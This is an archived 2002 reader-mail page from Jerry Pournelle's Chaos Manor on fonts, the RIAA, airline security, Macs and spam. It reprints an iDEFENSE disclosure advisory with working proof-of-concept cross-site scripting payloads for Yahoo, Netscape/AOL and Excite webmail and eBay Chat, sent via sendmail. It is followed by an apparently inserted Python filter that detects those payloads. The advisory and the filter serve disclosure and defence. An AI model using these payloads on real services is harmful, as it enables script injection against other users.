jp.jpg (13389 bytes)

CHAOS MANOR MAIL

Mail 219 August 19 - 25, 2002

 


IF YOU SEND MAIL it may be published; if you want it private SAY SO AT THE TOP of the mail. I try to respect confidences, but there is only me, and this is Chaos Manor. If you want a mail address other than the one from which you sent the mail to appear, PUT THAT AT THE END OF THE LETTER as a signature. In general, put the name you want at the end of the letter: if you put no address there none will be posted, but I do want some kind of name, or explicitly to say (name withheld).

Note that if you don't put a name in the bottom of the letter I have to get one from the header. This takes time I don't have, and may end up with a name and address you didn't want on the letter. Do us both a favor: sign your letters to me with the name and address (or no address) as you want them posted.

I try to answer mail, but mostly I can't get to all of it. I read it all, although not always the instant it comes in. I do have books to write too...  I am reminded of H. P. Lovecraft who slowly starved to death while answering fan mail. 


Boiler Plate:

If you want to PAY FOR THIS PLACE I keep the latest information HERE.  MY THANKS to all of you who sent money.  Some of you went to a lot of trouble to send money from overseas. Thank you! There are also some new payment methods. I am preparing a special (electronic) mailing to all those who paid: there will be a couple of these. I have thought about a subscriber section of the page. LET ME KNOW your thoughts.
If you subscribed, CLICK HERE for a Special Request.

If you didn't and haven't, why not?

If this seems a lot about paying think of it as the Subscription Drive Nag. You'll see more.


Monday, August 19, 2002

Thompson on the TrueType "abuse:"

According to Microsoft, "the downloads were being abused -- repackaged, modified and shipped with commercial products in violation of the EULA." I think we all concede their right to object to that, because the fonts were free-as-in-beer, not free-as-in-speech. It seems to me that a more reasonable course would have been to leave the fonts available for download and send a nastygram to whichever companies were repackaging them or shipping them with commercial products in violation of the EULA, but then I'm not Microsoft.

I see that Microsoft has made no attempt to prevent other sites from posting those fonts, so long as they are posted in their original form. That right was granted under the original license, and Microsoft seems not to be trying to backpedal on it.

I don't much care for many of Microsoft's business practices, but it seems to me that they're within their rights here.

-- Robert Bruce Thompson, thompson@ttgnet.com, http://www.ttgnet.com

And Roland comments:

I agree that they're within their rights - I just think it petty of them. A more nuanced approach, such as the one Thompson suggests, would be preferable.

Roland Dobbins

And I agree.

For bittersweet try:

A small visual effects studio in Australia has been doing an alternate-reality documentary for awhile now.

"This film is based on an alternative timeline to the Mercury-Gemini-Apollo era of reality - it is based on the premise that all that had been proposed in the early 1950's in Colliers actually came to pass - and sooner than they expected."

http://www.users.bigpond.net.au/surfacesrendered/MCSHomepage.html

And while we're looking at SF and Art on the Internet, have a look at http://www.e-sheep.com/spiders/  parts 1,2 and 3 (so far).

I'm no fan of e-comix, but this one manages to contain at least one good and original SF story. Thought-provoking too.

Regards, Alan E Brain, Canberra, Australia.

It may be that Kennedy's leap to the Moon was the wrong way to go. Of course I didn't think so at the time... John Pierce used to wonder if we wouldn't have been better off building sub-orbital re-usables and working our way up to orbit rather than designing disintegrating totem poles...

And Keith Langill says

So, for no good reason, I dragged my feet moving to Opera. You talked me into it today. ZOIKS! It's fast, baby! WAY FAST. Now I feel mildly stupid. Oh well.

-k

I'm still sort of stuck with IE but I won't be for too long. 


From: Stephen M. St. Onge saintonge@hotmail.com

subject: Artificial vision

Dear Jerry:

An interesting story from "Wired": apparently we're on the verge of artificial vision. WOW!

http://www.wired.com/wired/archive/10.09/vision_pr.html 

Best, Stephen

We've been on that verge for a long long time...

And Roland reminds me that I used to do a lot with HyperCard. The Mac version of Roberta's reading instruction program (if you need to teach someone age 4 and up to read English, this will do it) was written in SuperCard, which was a kind of HyperCard. HyperCard was one of the really great programming languages and one reason Apple was so useful. So of course Apple pretty well abandoned it. It's still out there, though.

Of course it won't work with the new Mac OS. At least not yet.

http://www.wired.com/news/mac/0,2125,54365,00.html 

But it is one great language. Simple to use. There were going to be Windows versions of HyperCard and I eagerly waited for them, but if one ever happened I missed its coming out. Pity again, because a SuperCard for Windows (SuperCard included sound, and could hand a phrase to the Mac's wonderful text to speech engine) would have been a really useful thing.

I suppose Visual Basic ate up the SuperCard for Windows but I wish it hadn't.

And about when you think RIAA can't go crazier, they do.

I note that you read and responded to my email about the RIAA lawsuit. Thanks.

I think the RIAA has started believing their own propaganda. It is one thing to bully individual artists, or threaten to launch hacker attacks against small fry on the internet. It is another thing entirely to launch ill-considered attacks against multi-national companies as big or bigger than they are. Even if politicians do come cheap, they should remember that their targets also have deep pockets.

Suppose whoever inherits UUNET were to go to Sony and Time Warner and tell them, "Sorry, but our lawyers tell us we are no longer allowed to maintain business dealings with companies that are in the process of litigation against us. So until this lawsuit is settled, we are not going to allow our routers to be used to access any of your web sites." That might be a bit more inconvenient than a DoS attack.

I have posted a call for a boycott of the RIAA on my web site at http://theforge.smithwrite.com in case you have any interest. Regardless, I appreciate your efforts in maintaining a useful and thought provoking web page.

Barry Smith

Well, I doubt a boycott would work, and indeed that's probably counterproductive. But perhaps not. Me, I do not intend to be deprived of Lord of The Rings.

And Mother India, that gentle home of non-violence, makes the news in an odd way:

Holy Cow a Myth? An Indian Finds the Kick Is Real. NYT, August 17, 2002, by Emily Eakin.

"Holy Cow: Beef in Indian Dietary Traditions," is a dry work of historiography buttressed by a 24-page bibliography and hundreds of footnotes citing ancient Sanskrit texts. It's the sort of book, in other words, that typically is read by a handful of specialists and winds up forgotten on a library shelf.

But when its author, Dwijendra Narayan Jha, a historian at the University of Delhi, tried to publish the book in India a year ago, he unleashed a furor of a kind not seen there since 1989, when the release of "Satanic Verses," Salman Rushdie's novel satirizing Islam, provoked rioting and earned him a fatwa from Ayatollah Ruhollah Khomeini.

As Mr. Jha's book was going to press last August, excerpts were posted on the Internet and picked up by newspapers. Within days the book had been canceled by Mr. Jha's academic publisher, burned outside his home by religious activists and - after a second publisher tried to print it - banned by a Hyderabad civil court. A spokesman for the World Hindu Council called it "sheer blasphemy." A former member of Parliament petitioned the government for Mr. Jha's arrest. Anonymous callers made death threats. And for 10 months Mr. Jha was obliged to travel to and from campus under police escort.

<snip>

Indeed....

Roland is reminded of the old Tom Lehrer song about "He gives the kids free samples, because he knows full well..."

The first taste is always free - until they're hooked.

http://www.nola.com/news/t-p/neworleans/index.ssf?/newsstory/o_microsoft16.html

The following is long, and involves a security warning that probably doesn't apply to you; but if it does, it might be important. Roland forwarded it, and I forwarded it along to subscribers, again on the theory that it probably wasn't relevant, but it might be.

From: David Endler <dendler@idefense.com>
To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications
Date: 19 Aug 2002 08:39:49 -0400

iDEFENSE Security Advisory 08.19.2002 Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications

Yahoo Mail - http://mail.yahoo.com
Netscape Mail - http://webmail.netscape.com
AOL Webmail - http://webmail.aol.com (same as Netscape Mail)
Excite Mail - http://mail.excite.com
eBay Chat - http://pages.ebay.com/community/chat/index.html

DESCRIPTION

Many Web Applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." Web Applications not meticulously filtering this untrusted content before presenting the web page to the user may allow for the manipulation of the web page and its content interpretation by a web browser.

This issue becomes dangerous when untrusted content is able to be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a user's browser with the exact same privileges as the legitimate web server.

Some Web Applications, such as Yahoo Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated content may elude the current filters and execute within the user's browser environment.

This allows the attacker to target users almost instantly, without relying on the user performing any activities other than normal usage. All vulnerabilities affect either the Microsoft Internet Explorer browser or Netscape, or both. These types of XSS vulnerabilities are usually classified as "constant-state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are detailed in an iDEFENSE paper available at http://www.idefense.com/XSS.html.

ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Response, this issue in Yahoo has since been addressed):

bash$ sendmail -t target@yahoo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>
<ILAYER SRC="script.js"></ILAYER>
</BODY></HTML>
.
--------------------------------------------------

*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

bash$ sendmail -t target@netscape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>
<IMG SRC="javasc&#X0A;ript:alert('test');">
</BODY></HTML>
.
--------------------------------------------------

*** Excite Webmail ***

It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@excite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>
<SCRIPT>alert(document.domain);</SCRIPT>
</BODY></HTML>
.
--------------------------------------------------

*** eBay Chat ***

While you are logged in as an eBay user, place the text string below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------

DISCOVERY CREDIT

Jeremiah Grossman (jeremiah@whitehatsec.com) Lex Arquette (lex@whitehatsec.com)

VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr@yahoo-inc.com), title "Paranoid Yahoo", responded and issue was fixed.

DISCLOSURE TIMELINE

June 27, 2002 - Exclusively Disclosed to iDEFENSE
July 16, 2002 - Ebay, AOL/Netscape, Yahoo, and Excite notified
July 16, 2002 - iDEFENSE Client Disclosure
August 11, 2002 - Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
August 19, 2002 - Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure

http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive, Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
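The advisory's payloads above (an unfiltered SCRIPT tag, an ILAYER tag, and an IMG whose scheme is split by an encoded newline) show why a webmail filter has to decode the markup the way a browser would before it decides anything. The following is an added example, not code from the advisory, from iDEFENSE, or from any vendor named in it; the tag and scheme allowlists are an assumed policy, and the sample bodies are the advisory's three demonstration messages plus one constructed benign message.

```python
"""Audit untrusted HTML the way a webmail client must: decode what the browser
would decode, then enforce an allowlist. Added example; the policy sets below
are assumptions, not any vendor's actual filter."""
import html
import re
from html.parser import HTMLParser

# Assumed policy: tags and URL schemes a webmail client is willing to render
# from an untrusted sender. Everything else is reported.
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "a", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def naive_url_is_allowed(url: str) -> bool:
    """The kind of check the advisory's obfuscated payload slips past: it looks
    at the raw attribute text, so 'javasc&#X0A;ript:' never matches."""
    return not url.lower().lstrip().startswith("javascript:")


def normalize_url(url: str) -> str:
    """Reduce a URL to the form a permissive browser would act on: decode
    character references (including hex forms such as &#X0A;), then drop the
    ASCII control characters and whitespace that Netscape 4.x and IE ignored
    inside a scheme."""
    decoded = html.unescape(url)
    return re.sub(r"[\x00-\x20]", "", decoded).lower()


def url_is_allowed(url: str) -> bool:
    """Allowlist on the normalized scheme; a scheme-less value is treated as a
    relative link."""
    normalized = normalize_url(url)
    if ":" not in normalized:
        return True
    scheme = normalized.split(":", 1)[0]
    return scheme in SAFE_SCHEMES


class UntrustedHtmlAuditor(HTMLParser):
    """Walk the markup with a real parser (which also decodes attribute values)
    and record anything outside the allowlist."""

    def __init__(self) -> None:
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names for us.
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"disallowed tag <{tag}>")
            return
        for name, value in attrs:
            if name in URL_ATTRS and value is not None and not url_is_allowed(value):
                self.findings.append(f"unsafe {name} on <{tag}>: {value!r}")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def audit(body: str) -> list:
    """Return the policy violations found in an untrusted HTML body; an empty
    list means the body passed."""
    auditor = UntrustedHtmlAuditor()
    auditor.feed(body)
    auditor.close()
    return auditor.findings


# Sample bodies: the first three are the advisory's demonstration messages,
# the fourth is a constructed benign message for contrast.
YAHOO_BODY = '<HTML><BODY><ILAYER SRC="script.js"></ILAYER></BODY></HTML>'
NETSCAPE_BODY = '<HTML><BODY><IMG SRC="javasc&#X0A;ript:alert(\'test\');"></BODY></HTML>'
EXCITE_BODY = "<HTML><BODY><SCRIPT>alert(document.domain);</SCRIPT></BODY></HTML>"
CLEAN_BODY = '<HTML><BODY><P>See <A HREF="http://www.ttgnet.com">this</A>.</P></BODY></HTML>'

if __name__ == "__main__":
    for label, body in [("Yahoo", YAHOO_BODY), ("Netscape/AOL", NETSCAPE_BODY),
                        ("Excite", EXCITE_BODY), ("clean", CLEAN_BODY)]:
        print(f"{label}: {audit(body) or 'OK'}")
    # The raw-text check lets the advisory's payload through; the normalized one does not.
    print("naive check allows payload:", naive_url_is_allowed("javasc&#X0A;ript:alert('test');"))
```

The same normalize-then-allowlist order applies to any filter that inspects user-supplied markup, which is the general lesson the advisory's four cases share.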

 


Suicide of the West

James Burnham said that liberalism is a philosophy of consolation for western civilization as it commits suicide. Apparently he was right. This from Roland:

No, this isn't the Onion.

http://www.sky.com/skynews/article/0,,30000-12090008,00.html 

I suppose nobody in Mr. Blair's Government remembers WPC Yvonne Fletcher, shot to death by agents of this same man, whose minions later blew up an airliner over Lockerbie?

Then we have:

Dear Sir,

I am an Uruk of Mordor, charged with the discovery of a number of valuable treasures within Moria. It has come to my notice that the mithril hoard previously owned by Ori of the land of Moria has been found by one of our cave-trolls. Under our laws, the hoard will be shared between our lord Sauron and the local Balrog, but so far neither knows the extent of the treasure.

Sir, I come to you as a respectful businessperson in order that we may derive some profit ourselves from this venture, I would wish that I could arrange for the transfer of half of the find to yourself, costing roughly 20,000 silver pennies. From this amount, I will then arrange for a further such that 25% remains your own, 5% goes for sundry costs (including hire of strong Rohan horses for use in transportation), 5% is given in bribe to the cave troll to ensure the quantity reported to our respective Lords is adjusted, 65% belongs to myself and my fellow Orcs.

In order that this be accomplished, I ask only that you provide details of:

Your willingness to participate in this venture,

Confirmation that you will not speak of this venture to anyone else, or wear any magic rings,

Your race and land of residence,

The location of your local Palantir or identity of your preferred message-carrying bird or beast,

Your given name, and any name you are known by in the Western lands,

The number of ponies you possess.

I look forward to your returning correspondence, which can be whispered to any passing magpie. I trust that you will ensure that no other dark feathered birds come to hear of this transaction.

Heh

 

 

 


Tuesday, August 20, 2002

See VIEW for why I'm still around today.

RE : Petty Tyrants

Jerry

You are wrong you know. The only security rules that are worth having are ones that are simple for everyone to understand.

"You are not allowed anything that is or looks like a gun" is simple and requires very little thought by the agent who is making these decisions thousands of times an hour.

The alternative, which goes something like "You are not allowed anything that is actually a gun" is open to interpretation and argument. This is a massive workload for the agent and therefore mistakes will be made.

Also - this is not a freedom issue, since all they had to do was put the doll in the hold luggage!

Paul

In other words, the purpose of airline security systems, which is to make airlines safer without closing them down, is unimportant: what's important is security. Grounding the airplanes forever will do that with no discretionary authority given the guards. Just close the airlines down.

If that's too drastic, how about body cavity searches for everyone? That would also make the airplanes secure. No one would fly on them of course.

Which is the point: the more silly things that are done, the less confidence passengers have. Confiscating a 4 inch plastic rifle replica doesn't make the airplane more secure, but it does make the passengers think the security system is a joke. Perhaps that wasn't the intended result, but it's the prudentially expected outcome, which is to say, it was intended assuming that you require someone to have more sense than a turnip to be in those Federal Agent jobs. Taking away discretion -- zero tolerance -- never works.

As to what freedoms to give up in order to fly: once again, if you start with the premise that the state is right and people are wrong you can come up with a lot of them. Me, I wouldn't mind having GI JOE in checked luggage if that were easy to do; but I'd rather require that every active duty firearms qualified officer and sergeant of the United States be required to carry a concealed firearm with suitable ammunition on every flight....

Joe Zeff looks at another liberty issue:

Florida's found a new way to harass women and invade their privacy: make unwed mothers advertise publicly for possible fathers: http://www.abcnews.go.com/sections/us/DailyNews/fathersrights020820.html?partner=earthlink

How this got passed so easily I don't understand, unless it was rushed through at the last minute to stifle dissent. We all know that politicians in general are all in favor of Free Speech supporting them, but oppose Free Speech if the words disagree with their position. They say that any challenge would have to reach the State Supreme Court, but I suspect that the aptly named SCOFLA would ask not what is right or wrong, but what the Democratic Party wants.

I suppose there are arguments in favor of something like this, though: it would run "The taxpayers are being asked to provide the money that the father ought to be paying. Therefore we are justified in trying to find the guy to stick him with the bill for his fun and games."

That doesn't mean I would vote for any such law; and of course if the woman isn't after state support, that's another story. And in fact I see this is an adoption law. Which makes it really odd. From the story:

Not everyone sees an anachronistic injustice here — fathers' rights groups say the Florida adoption law, which is garnering national attention, is a welcome attempt to secure paternal privileges in a legal and political system that they say generally sees mothers' needs and wishes as paramount.

"How can these dads know they have children when they have no notice that they are fathers," said Jeffery M. Leving, a Chicago attorney who specializes in fathers' rights.

Which isn't all that powerful an argument: in an era of hooking up, who's to know? Clarke thought that absolute identification methods (DNA) and foolproof contraception would end marriage as we know it and change society. (Childhood's End)  Of course so did Trotsky.

 

Abu Nidal is dead of one or more gunshot wounds, in Baghdad.

Iraq says he suicided when confronted by Iraqi officials with evidence that he was conspiring with Kuwait to oust the Saddam regime. http://www.cnn.com/2002/WORLD/meast/08/20/jordan.otsc/index.html

A newspaper in Palestine says Nidal had suffered from leukemia for years and that simple depression and suicide are what killed him. http://www.cnn.com/2002/WORLD/meast/08/19/mideast.nidal/index.html

There are rumors of "multiple gunshot wounds to the abdomen", which makes suicide unlikely if the rumors are true.

He won't be missed much, regardless of who gets credit.

Steve Setzer

And you may even see the fine hand of the Company here. The fox sometimes leaves tracks, although, as in Indonesia they are sometimes well concealed.

Roland finds a story he calls "Fighting back"

http://www.informationwave.net/news/20020819riaa.php 

and I suppose it is. Also from Roland

Shields up!

http://www.washtimes.com/world/20020820-86081662.htm 

and we also have

Jerry,

This is quite interesting if true.

http://www.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2F2002%2F08%2F19%2Fnmod19.xml

Regards,

Craig Arnold

Interesting indeed.

Dear Dr. Pournelle:

I read in your Byte column that you use POPUP Stopper, but have to disable it when sites use legitimate pop-up windows. I tried both POPUP Stopper and PopUpCop and found 'Cop so useful I paid $20 for the full version. The difference between the two is that PopUpCop allows legitimate pop-up windows to appear yet it stops the annoying ads. The trial version - at popupcop.com - has a 30-day limit, but it becomes indefinitely functional when you register.

-- Pete

I suppose I should look into this, but it's really no problem turning off Stopper in the few cases when I need it off...

 

 

 


Wednesday, August 21, 2002

 

Travelling

 

 

 


Thursday, August 22, 2002

Short shrift

What do you know, a nationally syndicated columnist who reads (and cites!) Mr. Heinlein. http://www.townhall.com/columnists/rossmackenzie/rm20020822.shtml  Hmmm, according to his bio, he has two sons who are naval officers. Cause or effect I wonder?

Greg Hemsath

I only have one boy in the Navy.

Hi Jerry

From reading your pages, it is obvious that you like spam about as much as I do -i.e. not much.

It seems to me that eliminating spam would not be hard to do, but it would involve that bugbear of modern society personal responsibility.

1. First thing to do is come up with a workable definition of spam - this may be the hardest step.

2. Second, we make spam illegal and designate suitable dire punishments.

3. Now here's the unpopular bit: we make every computer owner personally responsible for their computer and for who connects to it. If you give somebody access to your computer, you had better know who they are - and be able to prove it.

4. Now if I receive spam from your computer, the default assumption is that it is your fault. It is up to you to then prove that it came from somewhere else. If you cannot prove that it came from elsewhere, you are negligent and will be penalised (fines or whatever). I can be sure that after you receive such a fine, you will become much more diligent in controlling who connects to your computer. If it came from a broadband customer who was "owned" by a hacker, well the customer is responsible - s/he should have installed proper security. If they are a home user, there may be some liability on the ISP for not explaining security to their customer.

However you see where it is going. Spammers can only succeed if some internet connection is made available to them, either by a sympathetic or careless computer owner.

If the spam entered a backbone via a feed from another country, then the owner of that feed is responsible, unless s/he can identify the source further upstream.

Everybody complains about spam, but nobody wants to take the hard decisions.

That's my plan for solving the problem. I don't hold high hopes of anybody adopting it.

Aurema don't even know that I have opinions, let alone what they are. They certainly do not authorise my comments above.

Michael Smith, Senior Software Engineer

=====

Jerry

From your column:

> My one real complaint is that some critical information comes up in really
> tiny print—even on my 21" screen I have to get close and use reading lenses

I assume that you're using IE - if so there's a very quick solution to this one. Click on View -> Text Size and make the text larger. Change it back as easily - this is also a quick solution for several users on one system. If you're already using it at that setting, then you need to change your defaults.

On another topic - Microsoft. You used the phrase (in your last column, I think) "customer hostile policies" - which led me to think ...

I think that Microsoft now regards the public - including its customers, let alone other software companies, as "the enemy". Since everyone is - by the order of things - now a user of Microsoft Windows and Office, anyone who hasn't paid over the full licence fee is, by definition, criminal or in need of professional help. There are the disorganised (who haven't filled in their tax forms by the end of the year and haven't upgraded to the latest versions) the disabled (who use Apple) and the traitors (who use Linux) and the seriously educationally deprived (who may not have a computer) - the rest are trying to break the law which protects Microsoft. Microsoft no longer has to sell software - all they need to do is get a proper enforcement agency to make sure that MS get what nature and the rule of law have given them. A company at war has to hang on to every slight advantage they can get, and then paranoia becomes a useful strategy and (as your 4" rifle story shows) we live in paranoid times.

Philippa Sutton

People often confuse rules with the objective.

Roland finds the largest asteroid strike yet...

http://www.msnbc.com/news/797736.asp 

Wow. Then there's

Some animals are more transplantable than others.

http://news.bbc.co.uk/1/hi/sci/tech/2210306.stm 

And if you are a Microsoft Developer and use FTM, you need to see

http://www.theregus.com/content/4/26057.html 

 

 

 


Friday, August 23, 2002

We have a whole slew of vulnerabilities:

Much more than DoS, description highly misleading; can possibly be exploited to run code of attacker's choice in a privileged context.

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-045.asp

On and on it goes . . .

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-047.asp

http://www.cnn.com/2002/TECH/internet/08/23/microsoft.security.reut/index.html

http://www.theregus.com/content/55/26092.html 

-- Roland Dobbins

sigh.

Peter Glaskowsky on the Mac

Eric Pobirs wrote the following about the new PowerMac systems and was quoted in Mail 218:

> The oddnesses in the newly announced machines are more than minor. They
> reflect serious desperation. Part of this is due to a critical supplier who
> hasn't been able to keep up their end of the business (while their sole
> desktop CPU customer's low market share makes it increasingly unreasonable to
> try) and much of it is Apple's own fault for trying to keep too much in-house.

This makes no sense. What DOES make perfect sense is that there is far less money available for PowerPC CPU R&D than there is for Intel or AMD x86 processor R&D for some obvious reasons. Far fewer PowerMac computers are sold each year than those based on Intel and AMD processors. On top of that, Apple has a very different relationship with Motorola than PC OEMs have with Intel and AMD. Apple does some of the development work up front, and gets a price break on CPU unit costs later.

The result is that Motorola simply can't afford to put as much work into improving general-purpose integer and floating-point performance in the PowerPC family as Intel and AMD do. Instead, Motorola puts more work into boosting performance on certain functions that are especially important to Mac users, such as image and video processing.

And that's exactly the right thing to do. Few Mac users spend any significant amount of time waiting on the Microsoft Word spell checker. True, better integer performance would speed up C compilers and other socially rewarding programs. But when you've got limited resources, you have to allocate them to achieve the best possible return on the investment, and Motorola is doing that.

It's totally unfair to criticize Motorola for not being "able to keep up their end of the business." They're running their PowerPC business in a way that makes it profitable and sustainable, and I think Eric ought to ask himself if he could really do any better himself.

Apple, for its part, is doing an excellent job of system design using the components and technologies available to it. I see nothing to criticize there. Though again Apple has fewer resources available for system design than, say, Intel's core-logic division, Apple's chip sets are every bit the equal of anything on the PC platform.

Some people just seem to feel compelled to find fault with anything less than miraculous progress. These new PowerMacs have a new system architecture, unmatched performance on Photoshop and other apps, faster networking than any PC you can buy, and they run the best OS on the market. Sure, they have room for improvement. What doesn't?

> Lest I repeat the work of someone who has already gone into much detail, here is
> some observation about the new Macs:
> http://denbeste.nu/cd_log_entries/2002/08/Anunbelievablekludge.shtml
> I find little to disagree with in the Captain's notes.

That guy certainly is Clueless. He's already been obliged to add "updates" (that is, corrections, retractions, and apologies) that exceed the length of the original piece. He's even been forced to "update" the "updates".

Factually: No, the new PowerPC processors in these new PowerMacs are not "overclocked". No, the G5 has not been "cancelled". No, DDR-SDRAM does not have greater latency than conventional (single-data-rate) SDRAM. The guy clearly has no concept of what latency is, nor of how to analyze system technology. That's MY job, and I know when someone's faking it.

> Surely others notice how incredibly strange it is for a company to forego a lower price point for
> an entry level model by making dual processors the only shipping configuration.

Uh, Earth to Eric: Apple sells a whole BUNCH of machines with just one processor. The PowerMac is sold almost exclusively to professionals. The dual-processor configuration of these machines reflects what these customers want.

> We can still hope that IBM doesn't take too long to get that new CPU out in
> volume. Anyone interested in the future of PowerPC on the desktop will pay
> close attention to the details divulged at the Microprocessor Forum in October.

I should thank Eric for plugging our conference, and it's true that IBM will be disclosing a new 64-bit PowerPC processor based on the Power4 design at Microprocessor Forum, but just read the presentation description from our website ( http://www.mdronline.com/mpf/conf.html ):

Breaking Through Compute Intensive Barriers - IBM's New 64-bit PowerPC Microprocessor

Peter Sandon, Senior Processor Architect, Power PC Organization, IBM Microelectronics

IBM is disclosing the technical details of a new 64-bit PowerPC microprocessor designed for desktops and entry-level servers. Based on the award winning Power4 design, this processor is an 8-way superscalar design that fully supports Symmetric MultiProcessing. The processor is further enhanced by a vector processing unit implementing over 160 specialized vector instructions and implements a system interface capable of up to 6.4GB/s.

I have to add here that I am not privy to Apple's product plans. I haven't heard a word about this chip from anyone at Apple, and IBM has never said or implied that Apple is one of their customers for this chip. I have NO idea if Apple will ever use it, never mind any specific information on which Mac systems would receive it, or when -- but new processors often take a long time to come to market. I don't expect to see this chip in a mainstream Mac anytime Real Soon Now.


And from Joel Rosenberg:

"Rosenberg has become convinced that the FBI knows who sent out the anthrax letters, but isn't arresting him, because he has been involved in secret biological weapons research that the U.S. does not want revealed. "This guy knows too much, and knows things the U.S. isn't very anxious to publicize," Rosenberg said in an interview. "Therefore, they don't want to get too close.""

"Does any of this make sense?"

Sure. It makes sense if either:

a: the authorities really believe that Hatfill is the anthrax mailer *and* would be able to reveal information in his defense that is, in the authorities' opinion, more dangerous than a few deaths from anthrax mailings, which the open tailing and close attention have put a stop to anyway (call it the Graymail Theory),

and/or

b: they've figured out that they've got another Richard Jewell on their hands -- having been misdirected by Barbara "no relation" Rosenberg, who appears to be an utter idiot -- and rather than come out and admit it, need a cover story, and if Hatfill's life is ruined, all the better. (the Waco Theory)

I'm betting on the Waco Theory, myself. I'm kind of surprised he hasn't had a kick-in-the-door search. Yet. Be convenient if he were to make a sudden move . . .

This has all the earmarks of the sort of ignorance and panic that sent the SS into Steve Jackson's offices to prevent cyberattacks by seizing copies of his Cyberpunk RPG (which, as you know but they didn't bother to find out, is about as useful as a handbook for hacking and cracking into computers as, say, The Magic Goes Away is for creating real death spells).

The level of incompetence of the Praetorians continues to amaze me.

And from Dave Colton:

Alneda.Net was/is a prominent website front organization for Al Qaeda. You might be amused at what the web site says now: http://www.alneda.net


And that ought to be enough to think about for the evening...

Saturday,

This story is disturbing less for its content than for Yahoo and US News & World Report listing it as a "Top Story." I used to think Robert Heinlein's descriptions of news reports in his "future history" stories were impossible satires. I guess I was too optimistic.

http://news.yahoo.com/news?tmpl=story2&u=/usnews/20020817/ts_usnews/dark_side_of_the_moon_landing&e=1

James M. D. Wigderson, Waukesha

Top Story. Indeed. Crazy Years...

Sunday, August 25, 2002

Short shrift

Just my opinion; the latest ver (6.05, soon-to-be-7.0) of the Opera browser for Windows is almost THERE as a viable IE replacement. With all the alleged security shitte going on w/M$ nowadays I am hoping to be ~95% M$-free by year's end.

Anyways, Opera is really fast, noticeably faster than any other on Windows, and absolutely screams on Linux. Much more skinnable, MUCH more secure and, once you get used to it, just as easy to use and more versatile to boot.

Also, while nowhere near as intuitive (read easy-to-use) as Windows, Mandrake 8.2 has been running non-stop on a box here for 89 days w/o a reboot (can't say that 'bout WinXP). I'm gettin more comfortable and confident (competent?) w/it.

BTW, I am seriously thinking of gettin a new MAC w/the intent of trying out Jaguar. As you know {-:) it uses FreeBSD as the kernel, which means bullet-proof. Its new Quartz Extreme interface is very nice.

The pay ver of Opera (yes, they have a ver for the MAC) which eliminates the ad box, costs 10 bucks for students...

--------------------------------------------------------------------------------

It's a really hot summer everywhere, and water is more valuable than gasoline... And is the USA an Empire, or a Republic? Or something in between.

JV

====================

Jerry,

Maybe trivia, but the latest issue of Am. Heritage Invention & Technology has a cover story about that "indefinable something" that vacuum tubes offer to audio; borderline pseudoscience, but -- the glaring, embarrassing whopper is that the cover illustration, which the author and editors must have thought was a vacuum tube, is *not* a vacuum tube.

It doesn't even look like one! It's some sort of rare, museum-piece flashtube, with a coiled clear inner structure. Pretty picture, though; colored back light.

I wrote them, but haven't yet received a reply. Quarterly publications are probably on a relaxed schedule.

No reply needed.

Best,

Nicholas Bodley |*| Waltham, Mass.
Opera browser fan -- Registered, too
http://sincerechoice.org: A cause that I believe in.

Indeed

saf

This is Sunday August 25

